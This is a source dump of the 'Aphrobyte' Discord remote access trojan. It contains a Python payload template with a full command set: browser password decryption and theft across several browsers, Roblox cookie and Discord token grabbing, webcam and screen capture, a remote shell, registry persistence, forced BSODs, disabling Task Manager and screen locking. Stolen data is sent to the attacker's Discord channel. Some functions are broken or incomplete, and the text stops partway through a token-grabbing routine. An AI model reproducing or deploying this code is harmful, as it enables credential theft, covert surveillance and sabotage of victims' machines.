├── .buildmodules ├── exeic.ico ├── requirements.txt └── sample.py ├── App.config ├── Form1.Designer.cs ├── Form1.cs ├── Form1.resx ├── Program.cs ├── README.md ├── aphrobyte-discord-rat.csproj ├── aphrobyte-discord-rat.sln └── aphrobytelogo.ico /.buildmodules/exeic.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Riot-Byte/aphrobyte-rat/5bf2b09f581506049818009aefadc3de43881a21/.buildmodules/exeic.ico -------------------------------------------------------------------------------- /.buildmodules/requirements.txt: -------------------------------------------------------------------------------- 1 | PyInstaller 2 | opencv-python 3 | requests 4 | colorama 5 | termcolor 6 | pycryptodome 7 | pyautogui 8 | discord 9 | psutil 10 | rotate-screen 11 | pywin32 12 | pywin32-ctypes 13 | pypiwin32 14 | pyperclip 15 | tk 16 | browser_cookie3 17 | urllib3 18 | pillow -------------------------------------------------------------------------------- /.buildmodules/sample.py: -------------------------------------------------------------------------------- 1 | import pyautogui, cv2, time, threading, win32api, discord, requests,base64, os, json, psutil, ctypes,win32crypt, rotatescreen as rs, sys, winreg, subprocess, random, socket, pyperclip, tkinter as tk, tkinter.messagebox, browser_cookie3, inspect, urllib, shutil 2 | from discord.ext import commands 3 | from Crypto.Cipher import AES 4 | from ctypes import Structure, c_uint 5 | from re import findall 6 | 7 | intents = discord.Intents.all() 8 | client = commands.Bot(command_prefix='!', intents=intents) 9 | client.remove_command("help") 10 | 11 | ### CONFIGURATION 12 | 13 | token = "{token}" 14 | guild_id = "{guildid}" 15 | autostart = "{autostart}" 16 | antivm = "{antivm}" 17 | 18 | process_name = "{processname}" 19 | if not process_name.endswith(".exe"): 20 | process_name = process_name + ".exe" 21 | 22 | hide_after_exec = "{hideafterexec}" 23 | 24 | backdoor_location = "{backdoorlocation}" 25 | if backdoor_location == "\\AppData\\Roaming\\": 26 | backdoor_location = os.environ["appdata"] + "\\" + process_name 27 | else: 28 | backdoor_location = os.environ["appdata"] + "\\Microsoft\\" + process_name 29 | 30 | annc_channel_id = "{announcements}" 31 | pass_channel_id = annc_channel_id 32 | tokens_channel_id = annc_channel_id 33 | roblosecurity_channel_id = annc_channel_id 34 | 35 | ### CODE 36 | 37 | clientid = "" 38 | startup_enabled = False 39 | cookies = "" 40 | 41 | installationpath = sys._MEIPASS if getattr(sys, 'frozen', False) else os.path.dirname(os.path.abspath(__file__)) 42 | 43 | def admincheck(): 44 | val = ctypes.windll.shell32.IsUserAnAdmin() 45 | if val < 1: 46 | return False 47 | elif val > 0: 48 | return True 49 | 50 | 51 | help_menu = f""" 52 | Available commands for **{os.getlogin()}** : 53 | 54 | **!help** - Shows this message 55 | **!startup** - Adds the file to startup. 56 | **!exit** - Stop the RAT from working. 57 | **!usagelist** - Returns a list of active users. 58 | **!admin_check** - Checks if you are admin on target computer. 59 | **!bypass_uac** - Attempts to bypass UAC to get admin privileges. 60 | **!shell** - Run a shell command 61 | 62 | `-----SURVEILLANCE-----` 63 | 64 | **!screenshot** - Sends a screenshot of the target machine 65 | **!idletime** - Displays for how long the user has been AFK 66 | **!webcam_capture** - Capture a picture of the webcam. 67 | **!tasklist** - Returns a list of active tasks. 68 | 69 | `-----FILE MANAGEMENT-----` 70 | 71 | **!chdir** - Changes the current directory. **!chdir <** to go back one directory. 72 | **!chdisk** - Changes the current disk. (E, C, D, etc.) 73 | **!ls** - Displays all items in the current directory. 74 | **!download** - Downloads a file from the specified path. 75 | **!upload** - Uploads a file to the specified path. 76 | **!taskkill** - Kills the specified task. 77 | **!startfile** - Starts a file. 78 | **!delfile** - Deletes a file. 79 | **!hidefile** \ **!unhidefile** - Hides/unhides a file. 80 | 81 | `-----INFORMATION GATHERING-----` 82 | 83 | **!whois** - Prints the user"s name 84 | **!getip** - Gets the current user's IP address 85 | **!clipboard** - Returns a string of the user's clipboard. 86 | **!grabpasswords** - Steal all the passwords from the device. 87 | **!grabroblox** - Grabs the user's Roblox account cookie. 88 | **!hardware_list** - Lists the user's hardware on newlines. 89 | """ 90 | 91 | help_menu2 = """ 92 | **!grabdiscord** - Fetches the user's Discord account token. 93 | 94 | `-----SANCTIONING-----` 95 | 96 | **!bsod** - Blue screens the computer. 97 | **!disabletaskmgr** \ **!enabletaskmanager** - Disable/enable task manager. 98 | **!logoff** - Logs the user off. 99 | **!shutdown** - Shuts the user's PC off. 100 | **!restart** - Restarts the user's PC. 101 | **!blockscreen** - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS) 102 | **!critproc** - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD. 103 | **!screenflip** - Rotates the user's screen 90 degrees. 104 | 105 | `-----FUN-----` 106 | 107 | **!write** - Writes a sentence then presses enter. 108 | **!setclipboard** - Sets the clipboard to the specified string of text. 109 | **!forcedesktop** - Sends the user on desktop automatically. 110 | **!messmouse** - Shakes the user's cursor when they try to move the mouse, run this command again to stop. 111 | **!opensite** - Opens a site on the user's browser. 112 | **!key_press** - Press a key. 113 | **!showtaskbar** \ **!hidetaskbar** 114 | 115 | `-----COMMUNICATION-----` 116 | 117 | **!questionmsg** - Sends the user a question message. 118 | **!warningmsg** - Sends the user a warning message. 119 | **!errormsg** - Sends the user an error message. 120 | **!infomsg** - Sends the user an informative message. 121 | 122 | ```* You need to specify the usage ID after every command. Arguments come after. 123 | 124 | Example : !write (usage-id) (sentence) => !write 123456 Test sentence 125 | !questionmsg (usage-id) (message) => !questionmsg 123456 Test Message 126 | ``` 127 | """ 128 | 129 | idedd = "" 130 | 131 | chars = "1234567890" 132 | clientid = "".join(random.sample(chars, 6)) 133 | 134 | class LASTINPUTINFO(Structure): 135 | _fields_ = [ 136 | ('cbSize', c_uint), 137 | ('dwTime', c_uint) 138 | ] 139 | 140 | def get_idle_duration(): 141 | idle_time = win32api.GetTickCount() - win32api.GetLastInputInfo() 142 | idle_time /= 1000 143 | return idle_time 144 | 145 | def takeScreenshot(): 146 | temp = os.getenv('temp') 147 | sc = pyautogui.screenshot() 148 | sc.save(temp + "\screenshot.png") 149 | 150 | def disable_task_manager(): 151 | registry_path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" 152 | registry_name = "DisableTaskMgr" 153 | value = 1 154 | 155 | try: 156 | reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, registry_path, 0, winreg.KEY_SET_VALUE) 157 | winreg.SetValueEx(reg_key, registry_name, 0, winreg.REG_SZ, value) 158 | winreg.CloseKey(reg_key) 159 | return True 160 | except WindowsError as e: 161 | return e 162 | 163 | def enable_task_manager(): 164 | registry_path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" 165 | registry_name = "DisableTaskMgr" 166 | value = 0 167 | 168 | try: 169 | reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, registry_path, 0, winreg.KEY_SET_VALUE) 170 | winreg.SetValueEx(reg_key, registry_name, 0, winreg.REG_SZ, value) 171 | winreg.CloseKey(reg_key) 172 | return True 173 | except WindowsError as e: 174 | return e 175 | 176 | @client.event 177 | async def on_ready(): 178 | with urllib.request.urlopen("https://geolocation-db.com/json") as url: 179 | ldata = json.loads(url.read().decode()) 180 | cflag = ldata['country_code'] 181 | ipaddress = ldata['IPv4'] 182 | 183 | output = os.popen("wmic os get name").read() 184 | if "Windows 10" in output: 185 | platform = "Windows 10" 186 | elif "Windows 11" in output: 187 | platform = "Windows 11" 188 | elif "Windows 8" in output: 189 | platform = "Windows 8" 190 | elif "Windows 7" in output: 191 | platform = "Windows 7" 192 | else: 193 | platform = "Unbound" 194 | 195 | user = os.getlogin() 196 | host_id = socket.gethostname() 197 | #guild = client.get_guild(int(guild_id)) 198 | channel = client.get_channel(int(annc_channel_id)) 199 | takeScreenshot() 200 | path = f"{os.getenv('temp')}\screenshot.png" 201 | await channel.send(f""" 202 | ||@everyone|| The RAT has sniped :flag_{cflag.lower()}: **{user}** :flag_{cflag.lower()}: with desktop ID **{host_id}**. 203 | 204 | ``` APHROBYTE RAT v1.9.2 | {client.user.name} | RIOT ADMINISTRATION ``` 205 | 206 | :skull_crossbones: `->` IP Address : ||{ipaddress}|| <- :flag_{cflag.lower()}: 207 | :skull_crossbones: `->` Admin privileges : **{admincheck()}** 208 | :skull_crossbones: `->` Auto startup : **{autostart}** 209 | :skull_crossbones: `->` OS : **{platform}** 210 | :skull_crossbones: `->` Usage ID : ||{clientid}|| 211 | 212 | ``` APHROBYTE RAT v1.9.2 | {client.user.name} | RIOT ADMINISTRATION ``` 213 | 214 | Help menu : **!help ||{clientid}||** 215 | Get list of active users : **!usagelist** 216 | 217 | RAT installed in : `{installationpath}` 218 | 219 | :point_down: **__USER SCREEN__** :point_down: 220 | """, file=discord.File(path)) 221 | os.remove(path) 222 | print(f'{client.user} is now online! Clientid {clientid}') 223 | 224 | 225 | 226 | @client.command() 227 | async def help(ctx, *, usid): 228 | if usid == clientid: 229 | await ctx.send(help_menu) 230 | await ctx.send(help_menu2) 231 | 232 | @client.command() 233 | async def screenshot(ctx, *, usid): 234 | if usid == clientid: 235 | takeScreenshot() 236 | path = f"{os.getenv('temp')}\screenshot.png" 237 | await ctx.send(f"Surveillance SS -> **{os.getlogin()}**:",file=discord.File(path)) 238 | os.remove(path) 239 | 240 | @client.command() 241 | async def write(ctx, usid, *, sentence): 242 | if usid == clientid: 243 | pyautogui.write(sentence) 244 | pyautogui.press('enter') 245 | await ctx.send(f"The user has now written **{sentence}** on their computer.") 246 | 247 | @client.command() 248 | async def whois(ctx, *, usid): 249 | if usid == clientid: 250 | user = os.getlogin() 251 | await ctx.send(f"You are on **{user}**'s computer") 252 | 253 | @client.command() 254 | async def getip(ctx, *, usid): 255 | if usid == clientid: 256 | with urllib.request.urlopen("https://geolocation-db.com/json") as url: 257 | ldata = json.loads(url.read().decode()) 258 | cflag = ldata['country_code'] 259 | ipaddress = ldata['IPv4'] 260 | await ctx.send(f"**{os.getlogin()}**'s IP is :flag_{cflag.lower()}: **{ipaddress}** :flag_{cflag.lower()}:") 261 | 262 | @client.command() 263 | async def exit(ctx, *, usid): 264 | if usid == clientid: 265 | await ctx.send(f"The RAT process has been killed on **{os.getlogin()}**'s machine.") 266 | sys.exit() 267 | 268 | @client.command() 269 | async def bsod(ctx, *, usid): 270 | if usid == clientid: 271 | ntdll = ctypes.windll.ntdll 272 | prev_value = ctypes.c_bool() 273 | res = ctypes.c_ulong() 274 | ntdll.RtlAdjustPrivilege(19, True, False, ctypes.byref(prev_value)) 275 | if not ntdll.NtRaiseHardError(0xDEADDEAD, 0, 0, 0, 6, ctypes.byref(res)): 276 | await ctx.send("BSOD failed with unexpected error.") 277 | else: 278 | await ctx.send(f"{os.getlogin()} has been blue screened.") 279 | 280 | @client.command() 281 | async def startup(ctx, *, usid): 282 | if usid == clientid: 283 | if startup_enabled != True: 284 | path = sys.argv[0] 285 | isexe = False 286 | if (sys.argv[0].endswith("exe")): 287 | isexe = True 288 | if isexe: 289 | if (sys.argv[0].endswith("exe")): 290 | if not os.path.exists(backdoor_location): 291 | shutil.copyfile(sys.executable, backdoor_location) 292 | subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + backdoor_location + '" /f', shell=True) 293 | await ctx.send(f"Added file to startup for **{os.getlogin()}**") 294 | elif startup_enabled == True: 295 | await ctx.send(f"Startup already enabled for **{os.getlogin()}**") 296 | 297 | @client.command() 298 | async def disabletaskmgr(ctx, *, usid): 299 | if usid == clientid: 300 | value = disable_task_manager() 301 | if value == True: 302 | await ctx.send(f"Task manager has been disabled for **{os.getlogin()}**") 303 | else: 304 | await ctx.send("Insufficient permissions.") 305 | 306 | @client.command() 307 | async def enabletaskmgr(ctx, *, usid): 308 | if usid == clientid: 309 | value = enable_task_manager() 310 | if value == True: 311 | await ctx.send(f"Task manager has been enabled for **{os.getlogin()}**") 312 | else: 313 | await ctx.send("Insufficient permissions.") 314 | 315 | @client.command() 316 | async def idletime(ctx, *, usid): 317 | if usid == clientid: 318 | idletime = get_idle_duration() 319 | if idletime < 1: 320 | await ctx.send(f"**{os.getlogin()}** isn't idle.") 321 | elif idletime >= 1: 322 | await ctx.send(f'Idletime for **{os.getlogin()}**: {str(idletime)}') 323 | 324 | @client.command() 325 | async def clipboard(ctx, *, usid): 326 | if usid == clientid: 327 | current_clipboard = str(pyperclip.paste()) 328 | await ctx.send(f"Clipboard content for **{os.getlogin()}** is : \n\n{current_clipboard}") 329 | 330 | 331 | def my_chrome_datetime(time_in_mseconds): 332 | return dt(1601, 1, 1) + timedelta(microseconds=int(time_in_mseconds)) 333 | 334 | def encryption_key(browser): 335 | localState_path = None 336 | if browser == "Chrome": 337 | localState_path = os.path.join(os.environ["USERPROFILE"], 338 | "AppData", "Local", "Google", "Chrome", 339 | "User Data", "Local State") 340 | elif browser == "Edge": 341 | localState_path = os.path.join(os.environ["USERPROFILE"], 342 | "AppData", "Local", "Microsoft", "Edge", 343 | "User Data", "Local State") 344 | elif browser == "Opera GX": 345 | localState_path = os.path.join(os.environ["APPDATA"], 346 | "Opera Software", "Opera GX Stable", 347 | "Local State") 348 | elif browser == "Opera": 349 | localState_path = os.path.join(os.environ["APPDATA"], 350 | "Opera Software", "Opera Stable", 351 | "Local State") 352 | 353 | elif browser == "Brave": 354 | localState_path = os.path.join(os.environ["LOCALAPPDATA"], 355 | "BraveSoftware", "Brave-Browser", 356 | "User Data", "Local State") 357 | 358 | with open(localState_path, "r", encoding="utf-8") as file: 359 | local_state_file = file.read() 360 | local_state_file = json.loads(local_state_file) 361 | 362 | ASE_key = base64.b64decode(local_state_file["os_crypt"]["encrypted_key"])[5:] 363 | return win32crypt.CryptUnprotectData(ASE_key, None, None, None, 0)[1] # decrypted key 364 | 365 | def decrypt_password(enc_password, key, browser): 366 | try: 367 | init_vector = enc_password[3:15] 368 | enc_password = enc_password[15:] 369 | cipher = AES.new(key, AES.MODE_GCM, init_vector) 370 | return cipher.decrypt(enc_password)[:-16].decode() 371 | except: 372 | try: 373 | return str(win32crypt.CryptUnprotectData(enc_password, None, None, None, 0)[1]) 374 | except: 375 | return "No passwords available (logged in with social account)" 376 | 377 | def steal_chrome_passwords(): 378 | password_db_path = [] 379 | 380 | if os.path.exists(f"{os.getenv('userprofile')}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"): 381 | password_db_path.append(os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Default", "Login Data")) 382 | else: 383 | return {} 384 | 385 | for file in os.listdir(os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")): 386 | if file.startswith("Profile"): 387 | profile_number = file 388 | password_db_path.append(os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", profile_number, "Login Data")) 389 | 390 | all_data = {} 391 | 392 | for password_path in password_db_path: 393 | shutil.copyfile(password_path, "my_chrome_data.db") 394 | db = sqlite3.connect("my_chrome_data.db") 395 | cursor = db.cursor() 396 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 397 | encp_key = encryption_key("Chrome") 398 | data = {} 399 | for row in cursor.fetchall(): 400 | try: 401 | site_url = row[0] 402 | username = row[1] 403 | password = decrypt_password(row[2], encp_key, "Chrome") 404 | date_created = row[3] 405 | if username or password: 406 | if site_url not in data: 407 | data[site_url] = [] 408 | data[site_url].append( 409 | { 410 | "username": username, 411 | "password": password, 412 | "date_created": str(my_chrome_datetime(date_created)), 413 | } 414 | ) 415 | except: pass 416 | cursor.close() 417 | db.close() 418 | os.remove("my_chrome_data.db") 419 | 420 | all_data.update(data) 421 | 422 | return all_data 423 | 424 | 425 | def steal_firefox_passwords(): 426 | if not os.path.exists(os.path.join(os.environ["APPDATA"], "Mozilla", "Firefox", "Profiles")): 427 | return {} 428 | 429 | profiles = os.listdir(os.path.join(os.environ["APPDATA"], "Mozilla", "Firefox", "Profiles")) 430 | stolen_data = {} 431 | 432 | for profile in profiles: 433 | if profile.endswith(".default"): 434 | logins_path = os.path.join(os.path.join(os.environ["APPDATA"], "Mozilla", "Firefox", "Profiles"), profile, "logins.json") 435 | if os.path.isfile(logins_path): 436 | try: 437 | with open(logins_path, "r", encoding="utf-8") as file: 438 | logins_data = json.load(file) 439 | for login in logins_data["logins"]: 440 | site_url = login["hostname"] 441 | username = login["username"] 442 | password = login["password"] 443 | date_created = login["timeCreated"] 444 | if username or password: 445 | if site_url not in stolen_data: 446 | stolen_data[site_url] = [] 447 | stolen_data[site_url].append( 448 | { 449 | "username": username, 450 | "password": password, 451 | "date_created": str(my_chrome_datetime(date_created)), 452 | } 453 | ) 454 | except: pass 455 | return stolen_data 456 | 457 | def steal_edge_passwords(): 458 | 459 | if not os.path.exists(os.path.join(os.environ["LOCALAPPDATA"], "Microsoft", "Edge", "User Data", "Default", "Login Data")): 460 | return {} 461 | 462 | encp_key = encryption_key("Edge") 463 | 464 | shutil.copyfile(os.path.join(os.environ["LOCALAPPDATA"], "Microsoft", "Edge", "User Data", "Default", "Login Data"), "my_edge_data.db") 465 | db = sqlite3.connect("my_edge_data.db") 466 | cursor = db.cursor() 467 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 468 | data = {} 469 | for row in cursor.fetchall(): 470 | try: 471 | site_url = row[0] 472 | username = row[1] 473 | password = decrypt_password(row[2], encp_key, "Edge") 474 | date_created = row[3] 475 | if username or password: 476 | if site_url not in data: 477 | data[site_url] = [] 478 | data[site_url].append( 479 | { 480 | "username": username, 481 | "password": password, 482 | "date_created": str(my_chrome_datetime(date_created)), 483 | } 484 | ) 485 | except: pass 486 | cursor.close() 487 | db.close() 488 | os.remove("my_edge_data.db") 489 | return data 490 | 491 | def steal_opera_gx_passwords(): 492 | 493 | if not os.path.exists(f'{os.getenv("APPDATA")}\\Opera Software\\Opera GX Stable\\Login Data'): 494 | return {} 495 | 496 | encp_key = encryption_key("Opera GX") 497 | 498 | shutil.copyfile(os.path.join(os.environ["APPDATA"], "Opera Software", "Opera GX Stable", "Login Data"), "my_opera_data.db") 499 | db = sqlite3.connect("my_opera_data.db") 500 | cursor = db.cursor() 501 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 502 | data = {} 503 | for row in cursor.fetchall(): 504 | try: 505 | site_url = row[0] 506 | username = row[1] 507 | password = decrypt_password(row[2], encp_key, "Opera") 508 | date_created = row[3] 509 | if username or password: 510 | if site_url not in data: 511 | data[site_url] = [] 512 | data[site_url].append( 513 | { 514 | "username": username, 515 | "password": password, 516 | "date_created": str(my_chrome_datetime(date_created)), 517 | } 518 | ) 519 | except: pass 520 | cursor.close() 521 | db.close() 522 | os.remove("my_opera_data.db") 523 | return data 524 | 525 | def steal_brave_passwords(): 526 | if not os.path.exists(os.path.join(os.environ["LOCALAPPDATA"], "BraveSoftware", "Brave-Browser", "User Data", "Default", "Login Data")): 527 | return {} 528 | 529 | encp_key = encryption_key("Brave") 530 | 531 | shutil.copyfile(os.path.join(os.environ["LOCALAPPDATA"], "BraveSoftware", "Brave-Browser", "User Data", "Default", "Login Data"), "my_brave_data.db") 532 | db = sqlite3.connect("my_brave_data.db") 533 | cursor = db.cursor() 534 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 535 | data = {} 536 | for row in cursor.fetchall(): 537 | try: 538 | site_url = row[0] 539 | username = row[1] 540 | password = decrypt_password(row[2], encp_key, "Brave") 541 | date_created = row[3] 542 | if username or password: 543 | if site_url not in data: 544 | data[site_url] = [] 545 | data[site_url].append( 546 | { 547 | "username": username, 548 | "password": password, 549 | "date_created": str(my_chrome_datetime(date_created)), 550 | } 551 | ) 552 | except: pass 553 | cursor.close() 554 | db.close() 555 | os.remove("my_brave_data.db") 556 | return data 557 | 558 | def steal_opera_passwords(): 559 | if not os.path.exists(f'{os.getenv("APPDATA")}\\Opera Software\\Opera Stable\\Login Data'): 560 | return {} 561 | 562 | encp_key = encryption_key("Opera") 563 | 564 | shutil.copyfile(os.path.join(os.environ["APPDATA"], "Opera Software", "Opera Stable", "Login Data"), "my_opera_data.db") 565 | db = sqlite3.connect("my_opera_data.db") 566 | cursor = db.cursor() 567 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 568 | data = {} 569 | for row in cursor.fetchall(): 570 | try: 571 | site_url = row[0] 572 | username = row[1] 573 | password = decrypt_password(row[2], encp_key, "Opera") 574 | date_created = row[3] 575 | if username or password: 576 | if site_url not in data: 577 | data[site_url] = [] 578 | data[site_url].append( 579 | { 580 | "username": username, 581 | "password": password, 582 | "date_created": str(my_chrome_datetime(date_created)), 583 | } 584 | ) 585 | except: pass 586 | cursor.close() 587 | db.close() 588 | os.remove("my_opera_data.db") 589 | return data 590 | 591 | def steal_passwords(): 592 | chrome_data = steal_chrome_passwords() 593 | firefox_data = steal_firefox_passwords() 594 | edge_data = steal_edge_passwords() 595 | operagx_data = steal_opera_gx_passwords() 596 | opera_data = steal_opera_passwords() 597 | brave_data = steal_brave_passwords() 598 | 599 | combined_data = {**chrome_data, **firefox_data, **edge_data, **operagx_data, **opera_data, **brave_data} 600 | 601 | if len(combined_data) > 0: 602 | return combined_data 603 | else: 604 | return {} 605 | 606 | 607 | 608 | def save_credentials_as_file(credentials_data): 609 | filename = f"{os.getlogin()}-passwords.txt" 610 | with open(filename, "w", encoding="utf8") as file: 611 | for site_url, credentials_list in credentials_data.items(): 612 | file.write(f"Site URL: {site_url}\n") 613 | for credentials in credentials_list: 614 | file.write(f"Username: {credentials['username']}\n") 615 | file.write(f"Password: {credentials['password']}\n") 616 | file.write(f"Date Created: {credentials['date_created']}\n") 617 | file.write("\n") 618 | return filename 619 | 620 | 621 | @client.command() 622 | async def grabpasswords(ctx): 623 | if usid == clientid: 624 | await ctx.send(f":hourglass: Started grabbing **{os.getlogin()}**'s passwords" 625 | file_path = save_credentials_as_file(data) 626 | try: 627 | with open(file_path, "r", encoding="utf8") as file: 628 | file_data = discord.File(file, filename="stolen_credentials.txt") 629 | except Exception as e: 630 | await ctx.send("Couldn't grab passwords for **{os.getlogin()}**: `{e}`") 631 | return 632 | await ctx.send(f":white_check_mark: Grabbed **{os.getlogin()}**'s passwords", file=file_data) 633 | 634 | 635 | @client.command() 636 | async def logoff(ctx, *, usid): 637 | if usid == clientid: 638 | os.system("shutdown /l /f") 639 | await ctx.send(f"**{os.getlogin()}** logged off.") 640 | 641 | @client.command() 642 | async def shutdown(ctx, *, usid): 643 | if usid == clientid: 644 | await ctx.send(f"**{os.getlogin()}**'s PC has been shut down.") 645 | os.system("shutdown /p") 646 | 647 | @client.command() 648 | async def setclipboard(ctx, usid, *, clipboard): 649 | if usid == clientid: 650 | try: 651 | pyperclip.copy(clipboard) 652 | except Exception as e: 653 | await ctx.send(f'Error trying to set clipboard for **{os.getlogin()}**: `{e}`') 654 | current_clipboard = str(pyperclip.paste()) 655 | await ctx.send(f'Successfully set the clipboard to **{current_clipboard}** for **{os.getlogin()}**') 656 | 657 | @client.command() 658 | async def forcedesktop(ctx, *, usid): 659 | if usid == clientid: 660 | pyautogui.keyDown('winleft') 661 | pyautogui.press('d') 662 | pyautogui.keyUp('winleft') 663 | await ctx.send(f"Sent **{os.getlogin()}** to the desktop.") 664 | 665 | @client.command() 666 | async def webcam_capture(ctx, *, usid): 667 | if usid == clientid: 668 | camera_count = cv2.getBuildInformation().count("Video I/O") 669 | if camera_count == 0: 670 | await ctx.send(f"No cameras found for **{os.getlogin()}**.") 671 | return 672 | 673 | cam_number = 0 674 | for camera_index in range(camera_count): 675 | camera = cv2.VideoCapture(camera_index) 676 | success, frame = camera.read() 677 | if success: 678 | cam_number = cam_number + 1 679 | image_path = f"camera_{camera_index}.jpg" 680 | cv2.imwrite(image_path, frame) 681 | 682 | with open(image_path, "rb") as file: 683 | picture = discord.File(file, filename=image_path) 684 | embed = discord.Embed(color=discord.Color.green()) 685 | embed.set_image(url=f"attachment://{image_path}") 686 | await ctx.send(content=f"**{os.getlogin()}**'s webcam - **Camera {str(cam_number)}**",embed=embed, file=picture) 687 | 688 | os.remove(image_path) 689 | 690 | camera.release() 691 | if cam_number == 0: 692 | await ctx.send(f"**{os.getlogin()}** has no webcam available.") 693 | 694 | def on_closing(): 695 | pass 696 | 697 | def screenblock(): 698 | box = tk.Tk() 699 | box.attributes('-fullscreen', True) 700 | box.attributes("-topmost", True) 701 | box.configure(background='black') 702 | box.protocol("WM_DELETE_WINDOW", on_closing) 703 | box.mainloop() 704 | 705 | @client.command() 706 | async def blockscreen(ctx, *, usid): 707 | if usid == clientid: 708 | threading.Thread(target=screenblock, daemon=True).start() 709 | await ctx.send(f"**{os.getlogin()}**'s screen has been blocked.") 710 | 711 | 712 | mousemess = False 713 | 714 | def StartMouseMess(): 715 | global mousemess 716 | while mousemess: 717 | x=random.randint(600, 700) 718 | y=random.randint(600, 700) 719 | pyautogui.moveTo(x, y, 3) 720 | time.sleep(1) 721 | 722 | @client.command() 723 | async def messmouse(ctx, *, usid): 724 | if usid == clientid: 725 | global mousemess 726 | if mousemess == False: 727 | mousemess = True 728 | threading.Thread(target=StartMouseMess,daemon=True).start() 729 | await ctx.send(f"Started messing **{os.getlogin()}**'s mouse.") 730 | elif mousemess == True: 731 | mousemess = False 732 | await ctx.send(f"Stopped messing **{os.getlogin()}**'s mouse.") 733 | 734 | 735 | @client.command() 736 | async def usagelist(ctx): 737 | list_usage = f"Active : **{os.getlogin()}** with desktop ID **{socket.gethostname()}** and usage ID **{clientid}**. Admin privileges : **{admincheck()}** `v1.9.2`" 738 | await ctx.send(list_usage) 739 | 740 | @client.command() 741 | async def questionmsg(ctx, usid, *, message): 742 | if usid == clientid: 743 | await ctx.send(f"Sent **{os.getlogin()}** a question message.") 744 | root = tkinter.Tk() 745 | root.wm_attributes("-topmost", 1) 746 | root.withdraw() 747 | response = tkinter.messagebox.askyesno("Question", message, parent=root) 748 | if response: 749 | await ctx.send(f"**{os.getlogin()}** has replied with **Yes** to your question which was `{message}`") 750 | root.destroy() 751 | else: 752 | await ctx.send(f"**{os.getlogin()}** has replied with **No** to your question which was `{message}`") 753 | root.destroy() 754 | 755 | @client.command() 756 | async def warningmsg(ctx, usid, *, message): 757 | if usid == clientid: 758 | await ctx.send(f"Sent **{os.getlogin()}** a warning message.") 759 | root = tkinter.Tk() 760 | root.wm_attributes("-topmost", 1) 761 | root.withdraw() 762 | tk.messagebox.showwarning(title='Warning', message=message, parent=root) 763 | await ctx.send(f"**{os.getlogin()}** saw the warning sent which was `{message}`") 764 | root.destroy() 765 | 766 | @client.command() 767 | async def errormsg(ctx, usid, *, message): 768 | if usid == clientid: 769 | await ctx.send(f"Sent **{os.getlogin()}** an error message.") 770 | root = tkinter.Tk() 771 | root.wm_attributes("-topmost", 1) 772 | root.withdraw() 773 | tk.messagebox.showerror(title='Error', message=message, parent=root) 774 | root.destroy() 775 | 776 | @client.command() 777 | async def infomsg(ctx, usid, *, message): 778 | if usid == clientid: 779 | await ctx.send(f"Sent **{os.getlogin()}** an informative message.") 780 | root = tkinter.Tk() 781 | root.wm_attributes("-topmost", 1) 782 | root.withdraw() 783 | tk.messagebox.showinfo(title='Information', message=message, parent=root) 784 | await ctx.send(f"**{os.getlogin()}** acknowledged the informative message sent which was `{message}`") 785 | root.destroy() 786 | 787 | @client.command() 788 | async def opensite(ctx, usid, *, website): 789 | if usid == clientid: 790 | os.system(f"start {website}") 791 | await ctx.send(f"Opened **{website}** for **{os.getlogin()}**") 792 | 793 | @client.command() 794 | async def admin_check(ctx, usid): 795 | value = admincheck() 796 | if usid == clientid: 797 | if value: 798 | await ctx.send(f"You have admin privileges against **{os.getlogin()}**") 799 | elif not value: 800 | await ctx.send(f"You do not have admin privileges against **{os.getlogin()}**") 801 | 802 | def cookieLogger(): 803 | 804 | data = [] 805 | 806 | try: 807 | cookies = browser_cookie3.firefox(domain_name='roblox.com') 808 | for cookie in cookies: 809 | if cookie.name == '.ROBLOSECURITY': 810 | data.append(cookies) 811 | data.append(cookie.value) 812 | return data 813 | except: 814 | pass 815 | try: 816 | cookies = browser_cookie3.chromium(domain_name='roblox.com') 817 | for cookie in cookies: 818 | if cookie.name == '.ROBLOSECURITY': 819 | data.append(cookies) 820 | data.append(cookie.value) 821 | return data 822 | except: 823 | pass 824 | 825 | try: 826 | cookies = browser_cookie3.edge(domain_name='roblox.com') 827 | for cookie in cookies: 828 | if cookie.name == '.ROBLOSECURITY': 829 | data.append(cookies) 830 | data.append(cookie.value) 831 | return data 832 | except: 833 | pass 834 | 835 | try: 836 | cookies = browser_cookie3.opera(domain_name='roblox.com') 837 | for cookie in cookies: 838 | if cookie.name == '.ROBLOSECURITY': 839 | data.append(cookies) 840 | data.append(cookie.value) 841 | return data 842 | except: 843 | pass 844 | 845 | try: 846 | cookies = browser_cookie3.chrome(domain_name='roblox.com') 847 | for cookie in cookies: 848 | if cookie.name == '.ROBLOSECURITY': 849 | data.append(cookies) 850 | data.append(cookie.value) 851 | return data 852 | except: 853 | pass 854 | 855 | 856 | 857 | 858 | 859 | 860 | @client.command() 861 | async def grabroblox(ctx, *, usid): 862 | cookies = cookieLogger() 863 | roblox_cookie = cookies[1] 864 | if usid == clientid: 865 | postchannel = client.get_channel(int(roblosecurity_channel_id)) 866 | await ctx.send(f":skull_crossbones: Started searching for **{os.getlogin()}**'s ROBLOSECURITY") 867 | await postchannel.send(f""" 868 | {ctx.author.mention} .ROBLOSECURITY for **{os.getlogin()}** : 869 | ``` 870 | {roblox_cookie} 871 | ``` 872 | 873 | Bypass IP lock with https://rbxfresh.com/ 874 | """) 875 | await ctx.send(f":white_check_mark: **{os.getlogin()}**'s cookies have been sent in <#{roblosecurity_channel_id}>") 876 | 877 | def token_grab(): 878 | LOCAL = 